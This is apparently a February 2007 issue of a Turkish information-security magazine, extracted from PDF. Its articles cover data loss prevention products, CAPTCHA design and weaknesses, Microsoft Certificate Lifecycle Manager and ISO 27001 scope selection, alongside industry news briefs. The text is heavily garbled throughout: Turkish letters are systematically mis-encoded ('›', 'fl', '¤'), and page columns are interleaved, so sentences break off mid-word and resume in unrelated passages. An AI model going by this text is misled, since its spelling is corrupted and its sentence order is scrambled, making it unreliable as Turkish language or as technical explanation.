kodlar›n korunmas› ve iyi niyetle olsa bile içeri¤inin baflkalar›na gönderilmesini engellemek için iyi bir yöntemdir. Fikir Mülkiyeti Fikir ürünleri, telif haklar›, müflterilere özel gelifltirilen proje dokümanlar›, üretim formülleri ve benzeri bilgiler DLP ile korunarak ifl süreklili¤i sa¤lanabilir ve flirketin gelece¤i garanti alt›na al›nabilir. Coca-Cola’n›n formülünü merak etmeyen var m›? Ürün Seçimi Encryption DLP bir flifreleme ürünü de¤ildir. PKI ve benzeri yap›larda flifrelenmifl veriler çal›nsa bile, ilgili özel anahtara sahip olmayan kimselerce veriler görülemez. Birçok flifreleme ürünü veriyi sadece flifreler, yetkili kifli flifrelenmifl dosyay› açt›¤›nda içeri¤ini istedi¤i gibi baflkalar›na gönderebilir. Dolay›s› ile sadece flifreleme teknikleri DLP teknolojisinin yerini tutamaz. Sistem Güvenlik Yaz›l›m› Host IPS ve benzeri ürünler sistem güvenli¤i ile ilgilenir. Ancak sistemde hangi verilerin bulundu¤undan haberdar de¤illerdir. Dolay›s› ile hiçbir sistem güvenli¤i yaz›l›m› DLP teknolojisine muadil de¤ildir. Kullan›m Alanlar› Elbette DLP hizmetlerini istedi¤iniz her verinin korunmas› için kullanabilirsiniz. S›k kullan›lan örneklerin k›saca üzerin- Bir Data Loss Prevention ürünü seçerken atlanmamas› gereken birkaç konu bulunur. Elbette öncelikle ürünün deste¤i… Destek al›namayan hiçbir ürün katma de¤erli hizmet sa¤layamaz. Ortam deste¤i, avuçiçi bilgisayarlar, dizüstü bilgisayarlar, sunucular vb... Koruma kabiliyeti, dosya içinde ekran görüntüsü al›nabilmesi, uygulama ve a¤ katmanlar›nda koruma mekanizmas›, koruncak sistemin yeri, çevrimiçi ve çevrimd›fl› kullan›c›lar için destek ve merkezi politika yönetimi. Sizin de fark edece¤iniz gibi yaz›m›n hiçbir bölümünde marka belirtmedim. Mevcut sisteme ve mevcut ihtiyaçlara göre farkl› markalar daha verimli hizmetler sunabilir. Ancak en az›ndan araflt›rma yapabilmeniz için birkaç ürünü alfabetik s›ra ile yazmak istiyorum. Oakley Networks, McAfee DLP, PortAuthority, Verdasys, Vericept, Vontu. Bilgileriniz hep sizin olsun. flubat 2007 beyazflapka 33 Serkan AKIN [email protected] Murat LOSTAR [email protected] (Completely Automated Public Turing test to CAPTCHA tell Computers and Humans Apart) Nedir, Neden Kullan›l›r Carnegie Mellon School of Computer Science taraf›ndan gelifltirilen bir proje olan CAPTCHA’n›n amac›, bilgisayar ile insanlar›n davran›fllar›n› ay›rt etmek, istemcinin gerçekten bir insan oldu¤unu kan›tlamakt›r. Bu ayr›m› yapman›n daha fazla gerekli oldu¤u web uygulamalar›nda çok s›k kullan›lmaya bafllanm›flt›r. Sistemin çal›flmas› k›saca flöyledir. Sunucu rastgele bir resim oluflturur, istemci taraf›ndaki kifliden bu resimdeki yaz›y› okuyup, ilgili alana girmesi istenir. Buradaki basit mant›k o resimde sadece insan taraf›ndan okunabilecek, bir program taraf›ndan okunmas› zor olan bir kelime oluflturmakt›r. OCR (optik karakter tan›ma) programlar›, düzgün bir formda yaz›lm›fl yaz›y› bir resmin içinden okuyabilirler. Bu sebeple sunucu taraf›ndan üretilen resmin içindeki yaz›n›n bir insan taraf›ndan okunabilecek fakat OCR programlar› taraf›ndan okunamayacak derecede bozulmufl olmas› gerekir. ‹tiraf etmeliyim ki, CAPTCHA ile üretilmifl fakat benim okuyamad›¤›m resimlerle de karfl›lafl›yorum. Burada uygulamalar yaz›y› bozarken kantar›n topuzunu mu kaç›r›yor, yoksa benim zaten insan olarak alg›lanmamam m› gerekiyor, ondan emin olamad›m. ‹flin flakas› bir yana, gerçekten de üretilen karakterlerin bazen okunamamas› veya çok geliflmifl OCR programlar› taraf›ndan bazen resimlerin okunabiliyor olmas› gibi zay›fl›klar›na ra¤men, DYPM (Did You Pass Math, “3 art› sekiz kaç eder?” gibi sorular yönelterek otomatik yaz›l›mlar› engelleyen) veya resimler aras›ndan duygusal baz› kriterlerle seçim yap›lmas›n› isteyen v.b. gibi alternatif yöntemlerden flu an için daha kullan›fll› olmaya devam etmektedir. CHA kontrollerinde, bilinen bir resme ait ‘session ID’si kullan›larak, güvenlik herhangi bir OCR yaz›l›m› kullanmadan da afl›labilir. Paylafl›lan sunucularda, ayn› sunucuyu kullanan di¤er bir sanal ‘host’un yarataca¤› güvenlik a盤›, CAPTCHA kullan›lan siteyi de sald›r›lara aç›k hale getirebilir. CAPTCHA resminin, istemci taraf›nda oluflturuldu¤u uygulamalarda, kullan›c› taraf›nda çal›flt›r›lacak uygulamalarla resmin içine gizlenen metin, aç›k olarak görüntülenerek okunabilir. Baz› CAPTCHA sistemleri bunu önlemek için MD5 flifrelemesini kullanmas›na ra¤men bu flifrelemeler de art›k s›kl›kla k›r›labilmektedir. Uygulama .NET ile uygulama gelifltirenler için basit bir CAPTCHA kontrolü önerebilirim. Jeff Atwood taraf›ndan gelifltirilen bu kontrol ile web uygulamalar›n›za befl dakika içerisinde bir CAPTCHA kontrolü ekleyebilirsiniz. Hem ASP.NET 1.1, hem de ASP.NET 2.0 için kaynak kodlar› mevcut olan bu kontrolü ihtiyaçlar›n›za özel esnekliklerle kullanman›z mümkün. • Resim dinamik olarak üretilip, bellekten direkt olarak taray›c›ya gönderildi¤inden diskte yer kaplam›yor. • Resmin arkaplan›, fontlar ve opsiyonel olarak çizdirilen ekstra çizgilerin bozulma derecelerini, birbirinden ba¤›ms›z olarak ayarlayabiliyorsunuz. • Resmin boyutlar›n›, karakter say›s›n› ve kullan›lacak karakter setini belirleyebiliyorsunuz. (“1”, “I”, “0”, “O” gibi birbiri ile kar›flt›r›lma ihtimali olan karakterler gibi.) Güvenlik portal›na davet nternet, yararlar› yan›nda teknoloji ile birlikte gelen yeni yöntemlerin de yard›m›yla ne yaz›k ki, eski suçlar›n ifllendi¤i bir ortam olarak da günlük hayat›m›zda yer al›yor. Son zamanlarda gazetelerde ç›kan haberleri inceledi¤imizde, birtak›m f›rsatç› ve kötü niyetli kiflilerin bu konuyu sömürme girifliminde bulunma noktas›nda harekete geçirmifl olduklar›, “‹nternet üzerinden, insanlar› aldatarak k›sa yoldan nas›l para kazanabilirim?” sorusunun cevab›n› arad›klar›n› anl›yoruz. Bu durumun do¤al sonucu olarak bir de büyüyen “ma¤dur” tabaka var. I Özellikle sanal banka ma¤durlar›, kaybettikleri paralar›n da etkisiyle, bankalar› daha güvenli olmaya zorluyorlar. Bu güzel bir geliflme. Son olarak internet bankac›l›¤› kullan›larak yap›lan doland›r›c›l›klar›n kurbanlar›, haklar›n› aramak, toplu hareket ederek bu konuda bilinçlendirme sa¤lamak amac›yla bir dernek kurdular. Bilgi ve biliflim güvenli¤i konusu, temel olarak üç kavram üzerinde ayakta durmakt›r; Teknoloji, Süreçler ve ‹nsan. Teknolojinin getirdi¤i problemleri yine yeni teknolojilerin çözmesi, bizlerin al›fl›k oldu¤u teknolojik yöntemlerle sa¤lan›yor. Kap›lardaki kilitlerden, antivirüs yaz›l›mlar›na, flifreleme yöntemlerinden kimlik yönetimine kadar bir çok teknolojik çözüm, bize yard›mc› oluyor. Bilgi güvenli¤ini sa¤larken, teknolojiye tan›ml› yap›lar›n da yard›mc› olmas› gerekiyor. Bu yap›lar› k›saca ‘süreçler’ bafll›¤› ile tan›ml›yoruz. Politikalar (güvenlik politikas›, internet kullan›m politikas›, parola politikas› vb.), prosedürler (parola de¤ifltirme prosedürü, ziyaretçi prosedürü, sistem odas›na cihaz sokma prosedürü), ve benzeri tüm dokümantasyon, yap›lan ifllerin düzenlenmesine ve güvenli¤in sa¤lanmas›na yard›mc› oluyor. Ancak son kullan›c›lara da düflen görevler var. Bu- nun bafl›nda kullan›c›lar›n almas› gereken güvenlik önlemlerini bilmek ve uygulamak geliyor. Evimizi, arabam›z›, cüzdan›m›z› korurken uygulad›¤›m›z yöntemlerin benzerlerini bilgisayar›m›zdaki kimli¤imiz, bilgilerimiz ve param›z için de uygulamam›z gerekiyor. Peki teknoloji ile birlikte gelen riskler neler? Bu risklere kafl› uygulanmas› gereken önlemler nedir? Bu soruyu biliflim ve bilgi güvenli¤i uzmanlar› yo¤un bir flekilde tart›fl›yorlar. Ancak son kullan›c›lara yönelik bilgilerin bir araya topland›¤› Türkçe kaynak bulmak bu zamana kadar çok zordu. Bu eksikli¤i tamamlamak amac›yla, kar amac› gütmeyen, sponsorlar› sayesinde yayg›nlaflan bir portal hayata geçiyor: www.guvenlik.info. Bu portalda SPAM mesajlardan internet bankac›l›¤›na, parolalardan “‹nternet ve Çocuklar›m›z”a kadar bir çok konu ele al›n›yor. Bu yaz›y› okuyan hemen herkesin, bilgi güvenli¤i konusunda birikimi oldukça yüksek… Ya ifliniz bilgi güvenli¤i, ya da korunmas› gereken önemli bilgilere sahipsiniz. Her durumda sadece teknolojiden ve süreçlerden de¤il, insanlardan da yard›m almal›s›n›z. Konuya katk›s› olabilecek tüm uzmanlardan, son kullan›c›lara yönelik basit anlat›mla ele ald›klar› k›sa ipuçlar›, makaleleri, yöntemleri ve rastlad›klar› yeni parola avc›l›¤› (Phishing) mesajlar›n› bekliyoruz. Konu ne olursa olsun, internet kullan›m›, kredi kartlar›, SPAM, çocuklar›m›z, zararl› içerikler vs. güvenlik ile ilgili her konu, bu yap› içinde yer alacakt›r. Son kullan›c›lar›n anlayaca¤› dilde olmas› çok önemli. Ayr›ca, mümkün oldu¤unca grafik ve flekillerle desteklenmesi, ilgiyi art›racakt›r. Amac›m›z, Türkçe konuflan internet kullan›c›lar›na, bilgi güvenli¤i konusunda daha da katk›da bulunmak. Güvenli günler. Nerelerde Kullanabilirsiniz? Online Anketler, Üyelik formlar›, E-Posta Servisleri, Site içi Arama Sayfalar›, Arama Motorlar› taraf›ndan indekslenmesini istemedi¤iniz sayfalar›n›zda, Veya istemcinin bir robot olmas›n› istemeyece¤iniz tüm uygulamalarda... Kontrolle ilgili kaynak kodlar› ve kurulumla ilgili bilgiyi http://www.codeproject.com/aspnet/CaptchaControl.asp adresinden edinebilirsiniz. Güvenli Olmayan Uygulamalar Kaynaklar: CAPTCHA uygulamalar›nda, gözden kaç›r›labilen iki güvenlik sorunundan bahsetmekte fayda var. Resmin ‘session ID’ referans al›narak üretildi¤i baz› CAPT- http://en.wikipedia.org/wiki/Captcha http://www.codeproject.com/aspnet/CaptchaControl.asp http://www.captcha.net 34 beyazflapka flubat 2007 flubat 2007 beyazflapka 35 Umut AYDIN [email protected] Microsoft Certificate Lifecycle Manager’›n Getirdikleri retilen bilgilerin korunmas›, y›llarca biliflim sektörünün geliflmesine paralel olarak ilerleyen en yo¤un çal›flmalar›n bafl›nda gelmifltir. Güvenlik teknolojilerindeki geliflmelerde bu do¤rultuda yerinde saymam›flt›r tabiat›yla. ‹lk zamanlar›nda bilgisayar›n tüm fifllerini çekmenin veya güvenli bir kasa içerisinde tutman›n veri gizlili¤i için en temel ve güvenli yöntem oldu¤una inananlar, y›llar sonra a¤ teknolojileri, iflletme uygulamalar› ve internetin geliflimiyle birlikte üretilen verinin güvenli bir biçimde paylaflt›r›lmas› ihtiyac›yla karfl›laflt›klar›nda art›k firewall’lar üzerinde aç›l›p kapanan portlar›n, dosyalara konulan parolalar›n dahi yeterli olmad›¤›n› gördüler. Ü Günümüz bilgi güvenli¤i sektörünün en çok yükselen trendlerinin bafl›nda “Güvenli Kullan›c› Tan›mlama” modelleri gelmekte. “Çok faktörlü kimlik do¤rulama” (multifactor authentication) terimi de yak›n bir geçmiflten beri, gerek ifl yaflam›m›z da, gerekse gündelik hayatta kulland›¤›m›z finansal araçlarda (kredi kartlar›, internet flubeleri) içten içe yerini almaya bafllad›. Çok faktörlü kimlik tan›mlama en basit anlat›m›yla; sahip olunan bir bilginin yan› s›ra (PIN, parola) çeflitli donan›m veya verilerin (ak›ll› kart, USB token, biyometrik veriler) birlefltirilmesi ve karfl›laflt›r›lmas› sonucunda kiflinin yetki do¤rulamas›n›n yap›lmas› ifllemi olarak tarif edilebilir. Bu yöntemin günümüzde en yayg›n kullan›lan çeflidi, “iki faktörlü kimlik do¤rulama” (two factor authentication) olup, “bildi¤iniz bir fley ve sahip oldu¤unuz bir fley” (something you have, something you own) mant›¤›yla çal›flmaktad›r. Piyasada ise bu konu ile ilgili en çok kullan›lan donan›mlar›n bafl›nda ak›ll› kartlar (smart card) ve USB token’lar gelmektedir. RSA fiifreleme, sertifika depolama ve PIN do¤rulama gibi ifllemleri yapabilmelerinden ötürü, PKI (Public Key Infrastructure) uygulamalar›nda bu ürünler kullan›lmaktad›r. PKI ayr›ca ülkemizde ve dünyada çeflitli sertifika makamlar› taraf›ndan vatandafllara verilen sertifikalarla, kanun kapsam›nda belirtilen elektronik imza sistemi uygulamalar›nda inkar edilmezli¤i sa¤lamak maksad›yla da kullan›lmakta. ‹flletmelerde ise güvenli sistem girifli (secure logon), güvenli VPN eriflimi, dosya flifreleme ve imzalama ifllemleri baflta olmak üzere kifli do¤rulu¤unu kullan›c› sertifikalar›yla ispatlama amac›yla çal›fl›r. Daha evvel Windows Server 2003 ile birlikte gelen “Certificate Authority” (CA) servisleri ile birlikte PKI sistemi kurmay› denediyseniz ve kullan›c› say›n›z da bir hayli fazlaysa 36 beyazflapka flubat 2007 muhtemelen kart, sertifika da¤›t›m› ve yönetimi ile ilgili eksiklikleri yaflam›fls›n›zd›r. Microsoft, 2007 y›l›n›n ilk çeyre¤inde ç›karaca¤› ve flu an Beta 2 aflamas›nda olan Certificate Lifecycle Manager (CLM) ile iflletmelerde sertifika/kart da¤›t›m›n› kolaylaflt›r›p, yönetimi daha ölçeklenebilir hale getirmekte. CLM, Microsoft’un 2005 y›l›nda sat›n ald›¤› Alacris flirketine ait olan ve finans baflta olmak üzere farkl› sektörlerde kullan›lan idNexus ürünün daha da gelifltirilmesi ve MS CA destekli hale gelmesi ile çok güçlü bir araç halini ald›. Kullan›m Avantajlar› CLM bulunmayan PKI çözümlerinde, özellikle sertifika flablonlar› (certificate templates) oluflturma ve yay›nlama, sertifika iste¤i onaylama ve reddetme gibi ifllemlerin tümü için Microsoft Management Console (MMC), komut sat›r› veya sertifika sunucusunun web arayüzü ile ayr› ayr› yap›lmakta. CLM ile bu ifllemlerin tümü web tabanl› bir yönetim arayüzü ile tek merkezden yap›labilir hale getirilmekte. Tüm bu özelliklerin yan› s›ra ak›ll› kartlar›n engellenmesi (block), uygulanan engellerin kald›r›lmas›, tüm yap›lan ifllemlerin raporlanmas› ve belirli bir ifl ak›fl›na sokulmas› özelliklerini de içerisinde bar›nd›r›yor. Ürün bununla birlikte birden fazla sertifika sunucusunun (CA) çal›flt›¤› ortamlar› da desteklemekte. Ayn› flekilde birden fazla CLM ile tek bir sertifika sunucusunu yönetmek de mümkün. Kullan›c›lar için sertifika ve kart bilgilerinin detayl› olarak görüntülendi¤i, sertifika/kart isteklerinin yap›ld›¤› ve PIN bilgilerinin de¤iflimine imkan sunan bir arayüzü de CLM’de bulabilirsiniz. Böylelikle kurum içinde ilgili bilgi ifllem departman›n›n kullan›c›lardan gelen PKI bazl› istek ve sorular›na minimum kaynakla cevap verme imkan› sa¤lan›yor. CLM Bileflenleri Temeli web uygulamalar› üzerine kurulan CLM kullan›m› için iflletim sistemi olarak minimum Windows Server 2003 platformu gerekiyor. Active Directory (AD) ve sertifika servisleri (CA) ile entegre çal›flan CLM, kendi üretti¤i ve CA’de üretilen bütün konfigürasyon verilerini Microsoft SQL Server üzerinde tutuyor. CLM belli bafll› baz› fonksiyonel bileflenlerden olufluyor. Her bileflen de kendi içerisinde farkl› çekirdek modülleri içeriyor. Bu bileflenler: • Microsoft Sertifika Makam› • CLM sunucu taraf› bileflenleri • Sertifika yönetici ve sahipleri • Ak›ll› kartlar olarak s›ralanmaktad›r. Microsoft Sertifika Makam› CLM, sertifika sunucusu olarak; Windows Server 2003 üzerine kurulu sertifika makam› (CA) servislerini destekliyor. CA sunucusu üzerine CLM policy ve exit policy modüllerinin de kurulmas› gerek. CLM Sunucu Taraf› Bileflenleri Kurulum için Windows 2003 Server gerektiren CLM, arka tarafta Windows 2000/2003 AD yap›s›n› da desteklemekle beraber veritaban› sunucusu olarak Microsoft SQL Server 2000 (SP3) veya 2005’e ihtiyaç duyuyor. lan›c› uygulamas›n› da içerisinde bar›nd›r›yor. Ak›ll› Kartlar PKI ortam›nda CLM kullanabilmeniz için gerekli olan en son bileflenler; Ak›ll› Kart, Cyrptographic Service Provider (CSP) ve bir ak›ll› kart okuyucu. Beta 2 sürümü itibar›yla desteklenen ak›ll› kart middleware’leri flunlard›r: • Axalto Ver. 5.x • AET SafeSign Standart 2.1.8 • Siemens HiPath S›curity Card API V3.1 • Gemplus GemSafe 4.2 • Aladdin RTE 3.65 Planlama ve Kurulum ve Yeni Trendler Web tabanl› arayüz için minimum Microsoft Internet Information Server (IIS) 6.0 ve ASP.NET uygulamas›n›n çal›flt›r›labilmesi için .NET Framework gerekiyor. CLM sunucu bileflenleri Active Directory güvenlik izinlerinin baz al›nd›¤› “Kullan›c› Web Portal›” ve “Yönetim Web Portal›” web arayüzlerini de içerir. Sertifika Yönetici ve Sahipleri CLM’in taray›c› bazl› yönetim arayüzüne eriflmek için Internet Explorer 6 veya yukar› bir sürüme sahip olman›z yeterli. Secure Socket Layer/Transport Layer Security (SSL/TLS) özellikleri ile kullan›larak, tüm yönetici ve sertifika trafi¤i sa¤lanmakta. CLM kullan›c› taraf›nda sertifika yönetimi için herhangi bir yaz›l›m gerektirmemekle birlikte, da¤›t›m için opsyionel olarak Internet Explorer bazl› bir kul- Do¤ru bir PKI ortam› ve kurulum için amaç, güvenlik modelleri ve ifl süreçlerine uygun bir analiz/planlama yap›p, bu planlama do¤rultusunda sertifika sunucunuz üzerindeki kurallar› ve flablonlar› bu planlama do¤rultusunda yapman›z en do¤ru yol olacakt›r. Ayr›ca günümüz iflletmelerinde fiziksel ve sistem güvenli¤inin entegrasyonuna özellikle önem verilmekte olup her zaman belirtti¤imiz gibi kurumunuzda birden fazla bilgi adac›¤› yaratmamaya gayret göstermekle birlikte ak›ll› kart dünyas›nda da tek kartla hem fiziksel güvenlik (girifl-ç›k›fl, pdks vb.) hem sistem güvenli¤i uygulamalar›n› çözmenizde fayda var. Böylelikle CLM’in ak›ll› kart envanteri tutma özelli¤inden faydalanabilir ve farkl› kartlar›n envanter ve yönetimi için daha baflka çözümlere yat›r›m yapma gere¤i duymazs›n›z. flubat 2007 beyazflapka 37 KISA KISA KISA KISA KISA KISA KISA KISA KISA KISA Murat LOSTAR [email protected] Bilgi güvenli¤inde kapsam seçimi ilgi Güvenli¤i Yönetim Sistemi (BGYS) kurman›n ilk aflamas›, kapsam›n belirlenmesidir. Bilgi varl›klar›n›n belirlenmesi, sahiplerin atanmas›, güvenlik seviyelerinin sorgulanmas›, risklerin ve mevcut durumun ortaya konmas› kapsam taraf›ndan yönlendirilir. Özellikle ISO 27001 sertifikas›n› amaçlayan bir yönetim sistemi kuruluyorsa, hangi süreçlerin, departmanlar›n, flehirlerin kapsam içine al›n›p, hangilerinin d›flar›da b›rak›laca¤› daha da önem kazan›r. B Ancak burada önemli sorularla karfl› karfl›ya kal›r›z. Bilgi güvenli¤i kapsam›n› diledi¤imiz gibi seçebilir miyiz? Hangi seçim yolu izlendi¤inde daha kolay ve baflar›l› sistemler kurulabilir? Kapsam›n seçimi sadece yönetimin iste¤ine mi ba¤l›d›r? Kurumu herhangi bir yerinden dilimleyip, istedi¤imiz gibi bir kapsam belirleyebilir miyiz? Bu sorular›n cevab›n› önce TS/ISO 27001 standard›n› inceleyerek bulmaya çal›flal›m. Standartta yer alan, “Bu standartta, “ifl” terimi genifl anlamda kuruluflun varl›k amaçlar›n›n temeli olan etkinlikler anlam›na gelmektedir.”(*) aç›klamas›, kapsam›n mutlaka kuruluflun varl›k amaçlar›n›n temeli olan etkinlikleri içermesi gerekti¤ini söylemektedir. Ayr›ca, ayn› standard›n 4.2.1.a maddesi de “... kapsamdan herhangi bir d›flar›da b›rakman›n ayr›nt›lar› ve aç›klamas›n› da ekleyerek, BGYS kapsam›n› ve s›n›rlar›n› tan›mlama” zorunlulu¤unu ortaya koymaktad›r. Kapsam yaz›l› hale getirilirken içinde yer alan süreç, önemli varl›klar, ofisler, ba¤lant›lar, iliflkiler ve anlaflmalar tan›mlanmal›d›r. Kapsam içine alman›n ve d›fl›nda b›rakman›n nedenlerinin de yaz›l› hale getirilmesi, bu kapsamla çal›flacak tüm proje ekibinin istekleri daha iyi anlamas›na ve daha do¤ru kararlar vermesine yard›mc› olacakt›r. Ayr›ca, kapsam tan›m› ne kadar ayr›nt›l› yap›l›rsa, kapsam içi ile kapsam d›fl› aras›ndaki gri alanlar, ne kadar ince bir çizgi haline getirilip yaz›l› hale sokulursa, proje bafllang›c› ve baflar› olas›l›¤› o kadar artar. Kapsam seçimi s›ras›nda kullan›labilecek bir yöntem de, flekilde görüldü¤ü gibi, bir flema (görsel kapsam) haz›rlanmas›d›r. Görsel kapsama, kapsam içindeki departman ve süreçler, bunlar›n iliflkili oldu¤u di¤er flirket içi (ama kapsam d›fl› b›rak›lan) departman/süreçler ve son olarak flirket d›fl› kapsamla iliflkili kurumlar yerlefltirilir. Daha sonra, kapsam ile d›fl›ndakiler aras›ndaki veri ak›fllar› oklarla belirtilir. Bu oklar›n (flekilde kal›n çizgiyle gösterilmifltir) kapsam s›n›rlar›n› kesti¤i yerler ise, bize, anlaflman›n ya da mutabakat›n zorunlu oldu¤u noktalar› iflaret eder. Tüm bu iflaretli yerleri tan›mlayan en az bir yaz›l› doküman›n bulunmas› iliflkilerin anlafl›lmas›n› da kolaylaflt›racakt›r. 38 beyazflapka flubat 2007 • Amerikan Ulusal Güvenlik Ajans› (National Security Agency, NSA) sözcüsü Ken White, Microsoft Vista’n›n gelifltirme çal›flmalar›nda Microsoft’a yard›mc› olduklar›n› aç›klad›. NSA, Amerikan Savunma Bakanl›¤›nca aç›klanan gereksinimlere uygunluk sa¤lamak için bir çok flirkete ürün gelifltirme çal›flmalar›nda dan›flmanl›k sa¤l›yor. • Cisco Systems, web ve elektronik posta güvenli¤i sektörünün önemli oyuncular›ndan IronPort flirketini 830 Milyon Dolara sat›n ald›. • CheckPoint, IDS/IPS ve Firewall ürünlerine sahip NFR Security flirketini 20 Milyon Dolara sat›n ald›. • Symantec, Continuous Data Protection (CDP) üreticisi Revivio flirketini sat›n ald›. Revivio ürünleri ile üzerinde de¤ifliklik yap›lan dosyalar›n eski ve yeni sürümleri sistem taraf›ndan yedeklenebiliyor. Symantec, Revivio ürünlerini Symantec NetBackup ürün grubuna dahil edecek. • 1 Aral›k 2006 tarihinde US-CERT (United States-Computer Emergency Response Team) bankalara ve finansal kurulumlara siber terörist sald›r›s› alarm› gönderdi. • eEye, sadece S›f›r Gün (Zero-day) aç›klar›n› takip eden bir hizmet gelifltirdi¤ini duyurdu. • Microsoft antivirus pazar›ndan sonra güvenlik ve uyumluluk denetimi pazar›na da giriyor. Spider takma ad›yla gelifltirilen yeni Microsoft ürünü tüm biliflim sisteminin güvenlik aç›klar›n› taray›p raporlayabiliyor. • Türkiye’de Kas›m ve Aral›k aylar›nda binden fazla kifli MSN hesaplar›n›n çal›nd›¤› ve kifliler listesinde bulunan tan›d›klar›ndan cep telefonu kontörü istendi¤ini bildirerek emniyet birimlerine baflvurdu. • Microsoft Process Monitor arac›n› duyurdu. Ücretsiz da¤›t›m› yap›lan yaz›l›m iflletim sistemi de¤iflikliklerini izleyebiliyor. Yaz›l›m› ücretsiz indirmek için http://www.microsoft.com/technet/sysinternals/processesandthreads/processmonitor.mspx • Juniper Networks SSL-VPN ürünü grubu, Gartner raporlar›ndan sonra Forrester raporlar›nda da lider pozisyonunu ald›. ANA SPONSORLARIMIZ nebula Standart maddelerinden de anlafl›ld›¤› gibi, BGYS kapsam›n›n, tüm flirket olma zorunlulu¤u yoktur, ama flirket varl›k amaçlar›n› içermesi gerekmektedir. Örne¤in, bir finans kuruluflu, kendi finansal ifllerinden ya da süreçlerinden sadece bir k›sm›n› kapsam olarak tan›mlayabilir, ancak kapsam› sadece “çal›flanlar›n izin bilgilerini” olarak vermesi çok ifle yarar olmayacakt›r. Burada çal›flan izinleri kurumun varl›k amaçlar› içinde yer almamaktad›r. Oysa bir holdingin insan kaynaklar› firmas› için izin bilgileri en kritik bilgiler aras›nda yer alabilir ve kapsam olarak seçilebilir. Kapsam seçerken, kurum için kritik bir bilgi/bilgi grubu seçilebilece¤i gibi, bir ya da birden fazla ifl süreci ya da bir departmandaki tüm süreçler kullan›labilir. BGYS kurulmas› genellikle süreçler üzerinden devam etti¤inden, kapsam›n süreçlere ba¤l› olarak seçilmesi çok daha yararl›d›r. Kurumun BGYS kapsam›n›n, bilgi güvenli¤i aç›s›ndan en geliflmifl süreçlerinden/departmanlar›ndan bafllamas› da bir baflka avantajd›r. Böylece BGYS kurma çal›flmalar› s›ras›nda güvenlik seviyesinden çok, sistem kurmaya a¤›rl›k vermek mümkün olacakt›r. • NSS’in yeni nesil gelifltirilmifl Multi-Gigabit Network IPS testlerinin ilk turu tamamland›. 13 Ürünün kat›ld›¤› ilk turda sadece McAfee IntruShield 4010 serisi testlerden geçebildi. www.nebulabilisim.com.tr www.microsoft.com/turkiye KATILIMCI SPONSORLARIMIZ Kapsam belirlemek kadar önemli olan bir di¤er konu, bilgi güvenli¤i yönetim sistemini kurmaya bafllad›ktan sonra ilk döngü tamamlanana kadar kapsam› de¤ifltirmemektir. Kapsam, beraberinde hemen tüm BGYS süreçlerini, varl›klar›n›, iliflkilerini ve anlaflmalar›n› tan›mlar. Bu yüzden kapsam›n de¤iflmesi, tüm bu iliflkilerin yeniden de¤erlendirilmesini gerektirir. Güvenli günler! (*)TS ISO/EIC 27001:2005 Madde 1.1 INTERNET SPONSORU Beyaz fiapka’ya katk›lar›ndan dolay› tüm sponsorlar›m›za ve yazarlar›m›za teflekkür ederiz. Yay›nlanan yaz›lar›n tüm sorumlulu¤u yazarlar›na aittir. Lütfen her konuda fikrinizi yaz›n. www.beyazsapka.org [email protected] ‹LAN